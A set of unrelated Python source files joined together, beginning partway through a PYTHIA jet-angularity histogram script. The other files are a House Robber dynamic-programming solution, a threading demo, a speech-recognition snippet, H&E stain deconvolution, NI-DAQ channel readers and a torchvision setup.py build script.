lambda_i = lambda_beta_kappa_i(particle, jp, jetR, alpha, 1)
getattr(self, 'hPhaseSpace_%s_DeltaR_p_%sScaled' % (obs, label)).Fill(deltaR / jetR, lambda_i)
getattr(self, 'hPhaseSpace_%s_Pt_p_%sScaled' % (obs, label)).Fill(particle.pt(), lambda_i)
if 60 <= jch.pt() < 80:
getattr(self, 'hPhaseSpace_DeltaR_Pt_p_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
particle.pt(), deltaR / jetR)
getattr(self, 'hPhaseSpace_%s_DeltaR_p_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
deltaR / jetR, lambda_i)
getattr(self, 'hPhaseSpace_%s_Pt_p_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
particle.pt(), lambda_i)
ang_per_r_p = [ang_per_r_p[i] + lambda_i *
(deltaR <= ((i+1) * jetR * self.annulus_plots_max_x / num_r))
for i in range(0, num_r, 1)]
for i in range(0, num_r, 1):
getattr(self, 'hAnnulus_%s_p_%sScaled' % (obs, label)).Fill(
(i+1) * self.annulus_plots_max_x / num_r, ang_per_r_p[i] / (lp + 1e-11))
getattr(self, 'hAnnulus_%s_ch_%sScaled' % (obs, label)).Fill(
(i+1) * self.annulus_plots_max_x / num_r, ang_per_r_ch[i] / (lch + 1e-11))
if 60 <= jch.pt() < 80:
getattr(self, 'hAnnulus_%s_p_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
(i+1) * self.annulus_plots_max_x / num_r, ang_per_r_p[i] / (lp + 1e-11))
getattr(self, 'hAnnulus_%s_ch_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
(i+1) * self.annulus_plots_max_x / num_r, ang_per_r_ch[i] / (lch + 1e-11))
'''
# Residual plots (with and without divisor in y-axis)
getattr(self, "h_%sDiff_JetPt_%sScaled" % (obs, label)).Fill(jch.pt(), obs_p - obs_ch)
if obs_p: # prevent divide by 0
getattr(self, "h_%sResidual_JetPt_%sScaled" % (obs, label)).Fill(jp.pt(), (obs_p - obs_ch) / obs_p)
# 4D response matrices for "forward folding" to ch level
x = ([jch.pt(), jp.pt(), obs_ch, obs_p])
x_array = array('d', x)
getattr(self, 'hResponse_JetPt_%s_ch_%sScaled' % (obs, label)).Fill(x_array)
x = ([jh.pt(), jp.pt(), obs_h, obs_p])
x_array = array('d', x)
getattr(self, 'hResponse_JetPt_%s_h_%sScaled' % (obs, label)).Fill(x_array)
#---------------------------------------------------------------
# Fill jet histograms for MPI (which are just the H-->CH RMs)
#---------------------------------------------------------------
def fill_jet_histograms_MPI(self, jetR, jp, jh, jch):
for obs in self.observable_list:
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
jp_sd, jh_sd, jch_sd = None, None, None
if grooming_setting:
gshop_p = fjcontrib.GroomerShop(jp, jetR, self.reclustering_algorithm)
jp_sd = self.utils.groom(gshop_p, grooming_setting, jetR).pair()
gshop_h = fjcontrib.GroomerShop(jh, jetR, self.reclustering_algorithm)
jh_sd = self.utils.groom(gshop_h, grooming_setting, jetR).pair()
gshop_ch = fjcontrib.GroomerShop(jch, jetR, self.reclustering_algorithm)
jch_sd = self.utils.groom(gshop_ch, grooming_setting, jetR).pair()
obs_p, obs_h, obs_ch = None, None, None
# Calculate angularities
if obs == "ang":
alpha = obs_setting
kappa = 1
if grooming_setting:
obs_p = fjext.lambda_beta_kappa(jp, jp_sd, alpha, kappa, jetR)
obs_h = fjext.lambda_beta_kappa(jh, jh_sd, alpha, kappa, jetR)
obs_ch = fjext.lambda_beta_kappa(jch, jch_sd, alpha, kappa, jetR)
else:
obs_p = fjext.lambda_beta_kappa(jp, alpha, kappa, jetR)
obs_h = fjext.lambda_beta_kappa(jh, alpha, kappa, jetR)
obs_ch = fjext.lambda_beta_kappa(jch, alpha, kappa, jetR)
# Jet mass histograms
elif obs == "mass":
if grooming_setting:
# Untagged jets -- record underflow value
obs_p = jp_sd.m() if jp_sd.has_constituents() else -1
obs_h = jh_sd.m() if jh_sd.has_constituents() else -1
obs_ch = jch_sd.m() if jch_sd.has_constituents() else -1
else:
obs_p = jp.m()
obs_h = jh.m()
obs_ch = jch.m()
else:
raise ValueError("Observable not implemented in fill_unmatched_histograms")
# 4D response matrices for "forward folding" from h to ch level
x = ([jch.pt(), jh.pt(), obs_ch, obs_h])
x_array = array('d', x)
getattr(self, 'hResponse_JetPt_%s_Fnp_%sScaled' % (obs, label)).Fill(x_array)
#---------------------------------------------------------------
# Initiate scaling of all histograms and print final simulation info
#---------------------------------------------------------------
def scale_print_final_info(self, pythia, pythia_MPI):
# Scale all jet histograms by the appropriate factor from generated cross section
# and the number of accepted events
if not self.no_scale:
scale_f = pythia.info.sigmaGen() / self.hNevents.GetBinContent(1)
print("Weight MPIoff histograms by (cross section)/(N events) =", scale_f)
MPI_scale_f = pythia_MPI.info.sigmaGen() / self.hNeventsMPI.GetBinContent(1)
print("Weight MPIon histograms by (cross section)/(N events) =", MPI_scale_f)
self.scale_jet_histograms(scale_f, MPI_scale_f)
print()
print("N total final MPI-off events:", int(self.hNevents.GetBinContent(1)), "with",
int(pythia.info.nAccepted() - self.hNevents.GetBinContent(1)),
"events rejected at hadronization step")
self.hNevents.SetBinError(1, 0)
for jetR in self.jetR_list:
jetR_str = str(jetR).replace('.', '')
count1 = getattr(self, "count1_R%s" % jetR_str)
count2 = getattr(self, "count2_R%s" % jetR_str)
print(("For R=%s: %i jets cut at first match criteria; " + \
"%i jets cut at second match criteria.") %
(str(jetR), count1, count2))
print()
#---------------------------------------------------------------
# Scale all jet histograms by sigma/N
#---------------------------------------------------------------
def scale_jet_histograms(self, scale_f, MPI_scale_f):
for jetR in self.jetR_list:
hist_list_name = "hist_list_R%s" % str(jetR).replace('.', '')
for h in getattr(self, hist_list_name):
h.Scale(scale_f)
hist_list_MPIon_name = "hist_list_MPIon_R%s" % str(jetR).replace('.', '')
for h in getattr(self, hist_list_MPIon_name):
h.Scale(MPI_scale_f)
################################################################
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='pythia8 fastjet on the fly',
prog=os.path.basename(__file__))
pyconf.add_standard_pythia_args(parser)
# Could use --py-seed
parser.add_argument('--user-seed', help='PYTHIA starting seed', default=1111, type=int)
parser.add_argument('-o', '--output-dir', action='store', type=str, default='./',
help='Output directory for generated ROOT file(s)')
parser.add_argument('--tree-output-fname', default="AnalysisResults.root", type=str,
help="Filename for the (unscaled) generated particle ROOT TTree")
parser.add_argument('--no-tree', default=False, action='store_true',
help="Do not save tree of particle information, only create histograms")
parser.add_argument('--no-match-level', help="Save simulation for only one level with " + \
"no matching. Options: 'p', 'h', 'ch'", default=None, type=str)
parser.add_argument('--no-scale', help="Turn off rescaling all histograms by cross section / N",
action='store_true', default=False)
parser.add_argument('-c', '--config_file', action='store', type=str, default='config/angularity.yaml',
help="Path of config file for observable configurations")
args = parser.parse_args()
if args.no_match_level not in [None, 'p', 'h', 'ch']:
print("ERROR: Unrecognized type %s. Please use 'p', 'h', or 'ch'" % args.type_only)
exit(1)
# If invalid configFile is given, exit
if not os.path.exists(args.config_file):
print('File \"{0}\" does not exist! Exiting!'.format(args.configFile))
sys.exit(0)
# Use PYTHIA seed for event generation
if args.user_seed < 0:
args.user_seed = 1111
# Have at least 1 event
if args.nev < 1:
args.nev = 1
if args.py_noMPI:
print("\033[91m%s\033[00m" % "WARNING: py-noMPI flag ignored for this program")
time.sleep(3)
print()
process = pythia_parton_hadron(config_file=args.config_file, output_dir=args.output_dir, args=args)
process.pythia_parton_hadron(args)
|
'''
You are a professional robber planning to rob houses along a street. Each house has a certain amount of money stashed. All houses at this place are arranged in a circle. That means the first house is the neighbor of the last one. Meanwhile, adjacent houses have security system connected and it will automatically contact the police if two adjacent houses were broken into on the same night.
Given a list of non-negative integers representing the amount of money of each house, determine the maximum amount of money you can rob tonight without alerting the police.
Example 1:
Input: [2,3,2]
Output: 3
Explanation: You cannot rob house 1 (money = 2) and then rob house 3 (money = 2),
because they are adjacent houses.
Example 2:
Input: [1,2,3,1]
Output: 4
Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).
Total amount you can rob = 1 + 3 = 4.
'''
class Solution:
def robRec(self,nums,index,memo):
if index>=len(nums):
return 0
if memo[index]!=-1:
return memo[index]
if index==len(nums)-1:
memo[index]=nums[index]
if index==len(nums)-2:
memo[index]=max(nums[index:])
else:
memo[index]=max(self.robRec(nums,index+2,memo)+nums[index],self.robRec(nums,index+1,memo))
return memo[index]
def rob(self, nums):
if not nums:
return 0
if len(nums)<=2:
return max(nums)
index=0
memo1=[-1]*len(nums)
memo2=[-1]*len(nums)
return max(self.robRec(nums[:-1],index+2,memo1)+nums[index],self.robRec(nums,index+1,memo2))
"""
:type nums: List[int]
:rtype: int
"""
|
'''
l利用time函数,生成两个函数
顺序调用
计算总的运行时间
'''
import time
import _thread as thread
def loop1():
# ctime 得到当前时间
print('S loop 1 at: ',time.ctime())
# 睡眠多长时间,单位秒
time.sleep(4)
print('E loop 1 at :',time.ctime())
def loop2():
# ctime 得到当前时间
print('S loop 2 at: ', time.ctime())
# 睡眠多长时间,单位秒
time.sleep(2)
print('E loop 2 at :', time.ctime())
def main():
print('S at: ',time.ctime())
# 启动多线程的意思是用多线程去执行某个函数
# 启动多线程函数为start_new_thread
# 参数两个,一个是需要运行的参数名,第二个是函数的参数作为元组使用,为空则使用空远足
# 注意:如果函数只有一个参数,需要参数由后一个逗号
thread.start_new_thread(loop1,())
thread.start_new_thread(loop2, ())
print('all done at: ',time.ctime())
if __name__ == '__main__':
main()
while True:
time.sleep(1)
|
#!/usr/bin/env python3
# coding: utf-8
import os.path
import sys
sys.path.insert(0, os.path.abspath(os.path.join(__file__, "..", "..")))
import lglass.tools.roagen
if __name__ == "__main__":
lglass.tools.roagen.main()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 1 18:06:19 2020
@author: Attitude
"""
# Audio To Text (Speech Recognition)
# Import Library
import os
import speech_recognition as sr
sr.__version__
# Speech Recognition starts here
r = sr.Recognizer()
current_dir = os.path.dirname(os.path.realpath(__file__))
test_dir = os.path.join(current_dir, 'test_sound_mono')
fp = os.path.join(test_dir, 'datang_2.wav')
aud = sr.AudioFile(fp)
with aud as source:
audio = r.record(source)
r.recognize_google(audio)
# This is for checking audio variable type
type(audio)
|
# -*- coding: utf-8 -*-
#############################################################################
# Copyright Vlad Popovici <popovici@bioxlab.org>
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
#
# QPATH.STAIN.HE: stain deconvolution for H&E
#
from __future__ import (absolute_import, division, print_function, unicode_literals)
__author__ = "Vlad Popovici <popovici@bioxlab.org>"
__version__ = 0.1
__all__ = ['rgb2he', 'rgb2he_macenko']
import numpy as np
from scipy.linalg import eig
from skimage.exposure import rescale_intensity
def rgb2he(img):
"""Stain separation for H&E slides: estimate the H- and E- signal intensity
and the residuals.
Args:
img (numpy.ndarray): a H x W x 3 image array
Returns:
3 numpy arrays of size H x W with signal scaled to [0,1] corresponding
to estimated intensities of Haematoxylin, Eosine and background/resodual
components.
"""
# This implementation follows http://web.hku.hk/~ccsigma/color-deconv/color-deconv.html
assert (img.ndim == 3)
assert (img.shape[2] == 3)
height, width, _ = img.shape
img = -np.log((img + 1.0) / img.max())
D = np.array([[ 1.92129515, 1.00941672, -2.34107612],
[-2.34500192, 0.47155124, 2.65616872],
[ 1.21495282, -0.99544467, 0.2459345 ]])
rgb = img.swapaxes(2, 0).reshape((3, height*width))
heb = np.dot(D, rgb)
res_img = heb.reshape((3, width, height)).swapaxes(0, 2)
return rescale_intensity(res_img[:,:,0], out_range=(0,1)), \
rescale_intensity(res_img[:,:,1], out_range=(0,1)), \
rescale_intensity(res_img[:,:,2], out_range=(0,1))
def rgb2he_macenko(img, D=None, alpha=1.0, beta=0.15, white=255.0,
return_deconvolution_matrix=False):
"""
Performs stain separation from RGB images using the method in
M Macenko, et al. "A method for normalizing histology slides for quantitative analysis",
IEEE ISBI, 2009. dx.doi.org/10.1109/ISBI.2009.5193250
Args:
img (numpy.ndarray): RGB input image
D (numpy.ndarray): a deconvolution matrix. If None, one will be computed from the image
alpha (float): tolerance for pseudo-min/-max
beta (float): OD threshold for transparent pixels
white (float): white level (in each channel)
return_deconvolution_matrix (bool): if True, the deconvolution matrix is also returned
Returns:
three 2d arrays for H-, E- and remainder channels, respectively.
If return_deconvolution_matrix is True, the deconvolution matrix is also returned.
"""
assert (img.ndim == 3)
assert (img.shape[2] == 3)
I = img.reshape((img.shape[0] * img.shape[1], 3))
OD = -np.log((I + 1.0) / white) # optical density
if D is None:
# the deconvolution matrix is not provided so one has to be estimated from the
# image
rows = (OD >= beta).all(axis=1)
if not any(rows):
# no rows with all pixels above the threshold
raise RuntimeError('optical density below threshold')
ODhat = OD[rows, :] # discard transparent pixels
u, V, _ = eig(np.cov(ODhat.T))
idx = np.argsort(u) # get a permutation to sort eigenvalues increasingly
V = V[:, idx] # sort eigenvectors
theta = np.dot(ODhat, V[:, 1:3]) # project optical density onto the eigenvectors
# corresponding to the largest eigenvalues
phi = np.arctan2(theta[:,1], theta[:,0])
min_phi, max_phi = np.percentile(phi, [alpha, 100.0-alpha], axis=None)
u1 = np.dot(V[:,1:3], np.array([[np.cos(min_phi)],[np.sin(min_phi)]]))
u2 = np.dot(V[:,1:3], np.array([[np.cos(max_phi)],[np.sin(max_phi)]]))
if u1[0] > u2[0]:
D = np.hstack((u1, u2)).T
else:
D = np.hstack((u2, u1)).T
D = np.vstack((D, np.cross(D[0,],D[1,])))
D = D / np.reshape(np.repeat(np.linalg.norm(D, axis=1), 3), (3,3), order=str('C'))
img_res = np.linalg.solve(D.T, OD.T).T
img_res = np.reshape(img_res, img.shape, order=str('C'))
if not return_deconvolution_matrix:
D = None
return rescale_intensity(img_res[:,:,0], out_range=(0, 1)), \
rescale_intensity(img_res[:,:,1], out_range=(0,1)), \
rescale_intensity(img_res[:,:,2], out_range=(0,1)), \
D
# end rgb2he_macenko
|
from NIDAQ_1 import *
from NIDAQ_2 import *
from NIDAQ_3 import *
from NIDAQ_4 import *
from Coefficient import *
def Chan_1(points=CHUNK):
SetupTask1()
StartTask1()
data = ReadSamples1(points)
StopAndClearTask1()
return data
def Chan_2(points=CHUNK):
SetupTask2()
StartTask2()
data = ReadSamples2(points)
StopAndClearTask2()
return data
def Chan_3(points=CHUNK):
SetupTask3()
StartTask3()
data = ReadSamples3(points)
StopAndClearTask3()
return data
def Chan_4(points=CHUNK):
SetupTask4()
StartTask4()
data = ReadSamples4(points)
StopAndClearTask4()
return data
|
import distutils.command.clean
import distutils.spawn
import glob
import os
import shutil
import subprocess
import sys
import torch
from pkg_resources import DistributionNotFound, get_distribution, parse_version
from setuptools import find_packages, setup
from torch.utils.cpp_extension import BuildExtension, CppExtension, CUDA_HOME, CUDAExtension
def read(*names, **kwargs):
with open(os.path.join(os.path.dirname(__file__), *names), encoding=kwargs.get("encoding", "utf8")) as fp:
return fp.read()
def get_dist(pkgname):
try:
return get_distribution(pkgname)
except DistributionNotFound:
return None
cwd = os.path.dirname(os.path.abspath(__file__))
version_txt = os.path.join(cwd, "version.txt")
with open(version_txt) as f:
version = f.readline().strip()
sha = "Unknown"
package_name = "torchvision"
try:
sha = subprocess.check_output(["git", "rev-parse", "HEAD"], cwd=cwd).decode("ascii").strip()
except Exception:
pass
if os.getenv("BUILD_VERSION"):
version = os.getenv("BUILD_VERSION")
elif sha != "Unknown":
version += "+" + sha[:7]
def write_version_file():
version_path = os.path.join(cwd, "torchvision", "version.py")
with open(version_path, "w") as f:
f.write(f"__version__ = '{version}'\n")
f.write(f"git_version = {repr(sha)}\n")
f.write("from torchvision.extension import _check_cuda_version\n")
f.write("if _check_cuda_version() > 0:\n")
f.write(" cuda = _check_cuda_version()\n")
pytorch_dep = "torch"
if os.getenv("PYTORCH_VERSION"):
pytorch_dep += "==" + os.getenv("PYTORCH_VERSION")
requirements = [
"numpy",
"requests",
pytorch_dep,
]
# Excluding 8.3.* because of https://github.com/pytorch/vision/issues/4934
pillow_ver = " >= 5.3.0, !=8.3.*"
pillow_req = "pillow-simd" if get_dist("pillow-simd") is not None else "pillow"
requirements.append(pillow_req + pillow_ver)
def find_library(name, vision_include):
this_dir = os.path.dirname(os.path.abspath(__file__))
build_prefix = os.environ.get("BUILD_PREFIX", None)
is_conda_build = build_prefix is not None
library_found = False
conda_installed = False
lib_folder = None
include_folder = None
library_header = f"{name}.h"
# Lookup in TORCHVISION_INCLUDE or in the package file
package_path = [os.path.join(this_dir, "torchvision")]
for folder in vision_include + package_path:
candidate_path = os.path.join(folder, library_header)
library_found = os.path.exists(candidate_path)
if library_found:
break
if not library_found:
print(f"Running build on conda-build: {is_conda_build}")
if is_conda_build:
# Add conda headers/libraries
if os.name == "nt":
build_prefix = os.path.join(build_prefix, "Library")
include_folder = os.path.join(build_prefix, "include")
lib_folder = os.path.join(build_prefix, "lib")
library_header_path = os.path.join(include_folder, library_header)
library_found = os.path.isfile(library_header_path)
conda_installed = library_found
else:
# Check if using Anaconda to produce wheels
conda = shutil.which("conda")
is_conda = conda is not None
print(f"Running build on conda: {is_conda}")
if is_conda:
python_executable = sys.executable
py_folder = os.path.dirname(python_executable)
if os.name == "nt":
env_path = os.path.join(py_folder, "Library")
else:
env_path = os.path.dirname(py_folder)
lib_folder = os.path.join(env_path, "lib")
include_folder = os.path.join(env_path, "include")
library_header_path = os.path.join(include_folder, library_header)
library_found = os.path.isfile(library_header_path)
conda_installed = library_found
if not library_found:
if sys.platform == "linux":
library_found = os.path.exists(f"/usr/include/{library_header}")
library_found = library_found or os.path.exists(f"/usr/local/include/{library_header}")
return library_found, conda_installed, include_folder, lib_folder
def get_extensions():
this_dir = os.path.dirname(os.path.abspath(__file__))
extensions_dir = os.path.join(this_dir, "torchvision", "csrc")
main_file = glob.glob(os.path.join(extensions_dir, "*.cpp")) + glob.glob(
os.path.join(extensions_dir, "ops", "*.cpp")
)
source_cpu = (
glob.glob(os.path.join(extensions_dir, "ops", "autograd", "*.cpp"))
+ glob.glob(os.path.join(extensions_dir, "ops", "cpu", "*.cpp"))
+ glob.glob(os.path.join(extensions_dir, "ops", "quantized", "cpu", "*.cpp"))
)
source_mps = glob.glob(os.path.join(extensions_dir, "ops", "mps", "*.mm"))
print("Compiling extensions with following flags:")
force_cuda = os.getenv("FORCE_CUDA", "0") == "1"
print(f" FORCE_CUDA: {force_cuda}")
force_mps = os.getenv("FORCE_MPS", "0") == "1"
print(f" FORCE_MPS: {force_mps}")
debug_mode = os.getenv("DEBUG", "0") == "1"
print(f" DEBUG: {debug_mode}")
use_png = os.getenv("TORCHVISION_USE_PNG", "1") == "1"
print(f" TORCHVISION_USE_PNG: {use_png}")
use_jpeg = os.getenv("TORCHVISION_USE_JPEG", "1") == "1"
print(f" TORCHVISION_USE_JPEG: {use_jpeg}")
use_nvjpeg = os.getenv("TORCHVISION_USE_NVJPEG", "1") == "1"
print(f" TORCHVISION_USE_NVJPEG: {use_nvjpeg}")
use_ffmpeg = os.getenv("TORCHVISION_USE_FFMPEG", "1") == "1"
print(f" TORCHVISION_USE_FFMPEG: {use_ffmpeg}")
use_video_codec = os.getenv("TORCHVISION_USE_VIDEO_CODEC", "1") == "1"
print(f" TORCHVISION_USE_VIDEO_CODEC: {use_video_codec}")
nvcc_flags = os.getenv("NVCC_FLAGS", "")
print(f" NVCC_FLAGS: {nvcc_flags}")
is_rocm_pytorch = False
if torch.__version__ >= "1.5":
from torch.utils.cpp_extension import ROCM_HOME
is_rocm_pytorch = (torch.version.hip is not None) and (ROCM_HOME is not None)
if is_rocm_pytorch:
from torch.utils.hipify import hipify_python
hipify_python.hipify(
project_directory=this_dir,
output_directory=this_dir,
includes="torchvision/csrc/ops/cuda/*",
show_detailed=True,
is_pytorch_extension=True,
)
source_cuda = glob.glob(os.path.join(extensions_dir, "ops", "hip", "*.hip"))
# Copy over additional files
for file in glob.glob(r"torchvision/csrc/ops/cuda/*.h"):
shutil.copy(file, "torchvision/csrc/ops/hip")
else:
source_cuda = glob.glob(os.path.join(extensions_dir, "ops", "cuda", "*.cu"))
source_cuda += glob.glob(os.path.join(extensions_dir, "ops", "autocast", "*.cpp"))
sources = main_file + source_cpu
extension = CppExtension
define_macros = []
extra_compile_args = {"cxx": []}
if (torch.cuda.is_available() and ((CUDA_HOME is not None) or is_rocm_pytorch)) or force_cuda:
extension = CUDAExtension
sources += source_cuda
if not is_rocm_pytorch:
define_macros += [("WITH_CUDA", None)]
if nvcc_flags == "":
nvcc_flags = []
else:
nvcc_flags = nvcc_flags.split(" ")
else:
define_macros += [("WITH_HIP", None)]
nvcc_flags = []
extra_compile_args["nvcc"] = nvcc_flags
elif torch.backends.mps.is_available() or force_mps:
sources += source_mps
if sys.platform == "win32":
define_macros += [("torchvision_EXPORTS", None)]
define_macros += [("USE_PYTHON", None)]
extra_compile_args["cxx"].append("/MP")
if debug_mode:
print("Compiling in debug mode")
extra_compile_args["cxx"].append("-g")
extra_compile_args["cxx"].append("-O0")
if "nvcc" in extra_compile_args:
# we have to remove "-OX" and "-g" flag if exists and append
nvcc_flags = extra_compile_args["nvcc"]
extra_compile_args["nvcc"] = [f for f in nvcc_flags if not ("-O" in f or "-g" in f)]
extra_compile_args["nvcc"].append("-O0")
extra_compile_args["nvcc"].append("-g")
else:
print("Compiling with debug mode OFF")
extra_compile_args["cxx"].append("-g0")
sources = [os.path.join(extensions_dir, s) for s in sources]
include_dirs = [extensions_dir]
ext_modules = [
extension(
"torchvision._C",
sorted(sources),
include_dirs=include_dirs,
define_macros=define_macros,
extra_compile_args=extra_compile_args,
)
]
# ------------------- Torchvision extra extensions ------------------------
vision_include = os.environ.get("TORCHVISION_INCLUDE", None)
vision_library = os.environ.get("TORCHVISION_LIBRARY", None)
vision_include = vision_include.split(os.pathsep) if vision_include is not None else []
vision_library = vision_library.split(os.pathsep) if vision_library is not None else []
include_dirs += vision_include
library_dirs = vision_library
# Image reading extension
image_macros = []
image_include = [extensions_dir]
image_library = []
image_link_flags = []
if sys.platform == "win32":
image_macros += [("USE_PYTHON", None)]
# Locating libPNG
libpng = shutil.which("libpng-config")
pngfix = shutil.which("pngfix")
png_found = libpng is not None or pngfix is not None
use_png = use_png and png_found
if use_png:
print("Found PNG library")
if libpng is not None:
# Linux / Mac
min_version = "1.6.0"
png_version = subprocess.run([libpng, "--version"], stdout=subprocess.PIPE)
png_version = png_version.stdout.strip().decode("utf-8")
png_version = parse_version(png_version)
if png_version >= parse_version(min_version):
print("Building torchvision with PNG image support")
png_lib = subprocess.run([libpng, "--libdir"], stdout=subprocess.PIPE)
png_lib = png_lib.stdout.strip().decode("utf-8")
if "disabled" not in png_lib:
image_library += [png_lib]
png_include = subprocess.run([libpng, "--I_opts"], stdout=subprocess.PIPE)
png_include = png_include.stdout.strip().decode("utf-8")
_, png_include = png_include.split("-I")
image_include += [png_include]
image_link_flags.append("png")
print(f" libpng version: {png_version}")
print(f" libpng include path: {png_include}")
else:
print("Could not add PNG image support to torchvision:")
print(f" libpng minimum version {min_version}, found {png_version}")
use_png = False
else:
# Windows
png_lib = os.path.join(os.path.dirname(os.path.dirname(pngfix)), "lib")
png_include = os.path.join(os.path.dirname(os.path.dirname(pngfix)), "include", "libpng16")
image_library += [png_lib]
image_include += [png_include]
image_link_flags.append("libpng")
else:
print("Building torchvision without PNG image support")
image_macros += [("PNG_FOUND", str(int(use_png)))]
# Locating libjpeg
(jpeg_found, jpeg_conda, jpeg_include, jpeg_lib) = find_library("jpeglib", vision_include)
use_jpeg = use_jpeg and jpeg_found
if use_jpeg:
print("Building torchvision with JPEG image support")
print(f" libjpeg include path: {jpeg_include}")
print(f" libjpeg lib path: {jpeg_lib}")
image_link_flags.append("jpeg")
if jpeg_conda:
image_library += [jpeg_lib]
image_include += [jpeg_include]
else:
print("Building torchvision without JPEG image support")
image_macros += [("JPEG_FOUND", str(int(use_jpeg)))]
# Locating nvjpeg
# Should be included in CUDA_HOME for CUDA >= 10.1, which is the minimum version we have in the CI
nvjpeg_found = (
extension is CUDAExtension
and CUDA_HOME is not None
and os.path.exists(os.path.join(CUDA_HOME, "include", "nvjpeg.h"))
)
use_nvjpeg = use_nvjpeg and nvjpeg_found
if use_nvjpeg:
print("Building torchvision with NVJPEG image support")
image_link_flags.append("nvjpeg")
else:
print("Building torchvision without NVJPEG image support")
image_macros += [("NVJPEG_FOUND", str(int(use_nvjpeg)))]
image_path = os.path.join(extensions_dir, "io", "image")
image_src = glob.glob(os.path.join(image_path, "*.cpp")) + glob.glob(os.path.join(image_path, "cpu", "*.cpp"))
if is_rocm_pytorch:
image_src += glob.glob(os.path.join(image_path, "hip", "*.cpp"))
# we need to exclude this in favor of the hipified source
image_src.remove(os.path.join(image_path, "image.cpp"))
else:
image_src += glob.glob(os.path.join(image_path, "cuda", "*.cpp"))
if use_png or use_jpeg:
ext_modules.append(
extension(
"torchvision.image",
image_src,
include_dirs=image_include + include_dirs + [image_path],
library_dirs=image_library + library_dirs,
define_macros=image_macros,
libraries=image_link_flags,
extra_compile_args=extra_compile_args,
)
)
# Locating ffmpeg
ffmpeg_exe = shutil.which("ffmpeg")
has_ffmpeg = ffmpeg_exe is not None
ffmpeg_version = None
# FIXME: Building torchvision with ffmpeg on MacOS or with Python 3.9
# FIXME: causes crash. See the following GitHub issues for more details.
# FIXME: https://github.com/pytorch/pytorch/issues/65000
# FIXME: https://github.com/pytorch/vision/issues/3367
if sys.platform != "linux" or (sys.version_info.major == 3 and sys.version_info.minor == 9):
has_ffmpeg = False
if has_ffmpeg:
try:
# This is to check if ffmpeg is installed properly.
ffmpeg_version = subprocess.check_output(["ffmpeg", "-version"])
except subprocess.CalledProcessError:
print("Building torchvision without ffmpeg support")
print(" Error fetching ffmpeg version, ignoring ffmpeg.")
has_ffmpeg = False
use_ffmpeg = use_ffmpeg and has_ffmpeg
if use_ffmpeg:
ffmpeg_libraries = {"libavcodec", "libavformat", "libavutil", "libswresample", "libswscale"}
ffmpeg_bin = os.path.dirname(ffmpeg_exe)
ffmpeg_root = os.path.dirname(ffmpeg_bin)
ffmpeg_include_dir = os.path.join(ffmpeg_root, "include")
ffmpeg_library_dir = os.path.join(ffmpeg_root, "lib")
gcc = os.environ.get("CC", shutil.which("gcc"))
platform_tag = subprocess.run([gcc, "-print-multiarch"], stdout=subprocess.PIPE)
platform_tag = platform_tag.stdout.strip().decode("utf-8")
if platform_tag:
# Most probably a Debian-based distribution
ffmpeg_include_dir = [ffmpeg_include_dir, os.path.join(ffmpeg_include_dir, platform_tag)]
ffmpeg_library_dir = [ffmpeg_library_dir, os.path.join(ffmpeg_library_dir, platform_tag)]
else:
ffmpeg_include_dir = [ffmpeg_include_dir]
ffmpeg_library_dir = [ffmpeg_library_dir]
for library in ffmpeg_libraries:
library_found = False
for search_path in ffmpeg_include_dir + include_dirs:
full_path = os.path.join(search_path, library, "*.h")
library_found |= len(glob.glob(full_path)) > 0
if not library_found:
print("Building torchvision without ffmpeg support")
print(f" {library} header files were not found, disabling ffmpeg support")
use_ffmpeg = False
else:
print("Building torchvision without ffmpeg support")
if use_ffmpeg:
print("Building torchvision with ffmpeg support")
print(f" ffmpeg version: {ffmpeg_version}")
print(f" ffmpeg include path: {ffmpeg_include_dir}")
print(f" ffmpeg library_dir: {ffmpeg_library_dir}")
# TorchVision base decoder + video reader
video_reader_src_dir = os.path.join(this_dir, "torchvision", "csrc", "io", "video_reader")
video_reader_src = glob.glob(os.path.join(video_reader_src_dir, "*.cpp"))
base_decoder_src_dir = os.path.join(this_dir, "torchvision", "csrc", "io", "decoder")
base_decoder_src = glob.glob(os.path.join(base_decoder_src_dir, "*.cpp"))
# Torchvision video API
videoapi_src_dir = os.path.join(this_dir, "torchvision", "csrc", "io", "video")
videoapi_src = glob.glob(os.path.join(videoapi_src_dir, "*.cpp"))
# exclude tests
base_decoder_src = [x for x in base_decoder_src if "_test.cpp" not in x]
combined_src = video_reader_src + base_decoder_src + videoapi_src
ext_modules.append(
CppExtension(
"torchvision.video_reader",
combined_src,
include_dirs=[
base_decoder_src_dir,
video_reader_src_dir,
videoapi_src_dir,
extensions_dir,
*ffmpeg_include_dir,
*include_dirs,
],
library_dirs=ffmpeg_library_dir + library_dirs,
libraries=[
"avcodec",
"avformat",
"avutil",
"swresample",
"swscale",
],
extra_compile_args=["-std=c++17"] if os.name != "nt" else ["/std:c++17", "/MP"],
extra_link_args=["-std=c++17" if os.name != "nt" else "/std:c++17"],
)
)
# Locating video codec
# CUDA_HOME should be set to the cuda root directory.
# TORCHVISION_INCLUDE and TORCHVISION_LIBRARY should include the location to
# video codec header files and libraries respectively.
video_codec_found = (
extension is CUDAExtension
and CUDA_HOME is not None
and any([os.path.exists(os.path.join(folder, "cuviddec.h")) for folder in vision_include])
and any([os.path.exists(os.path.join(folder, "nvcuvid.h")) for folder in vision_include])
and any([os.path.exists(os.path.join(folder, "libnvcuvid.so")) for folder in library_dirs])
)
use_video_codec = use_video_codec and video_codec_found
if (
use_video_codec
and use_ffmpeg
and any([os.path.exists(os.path.join(folder, "libavcodec", "bsf.h")) for folder in ffmpeg_include_dir])
):
print("Building torchvision with video codec support")
gpu_decoder_path = os.path.join(extensions_dir, "io", "decoder", "gpu")
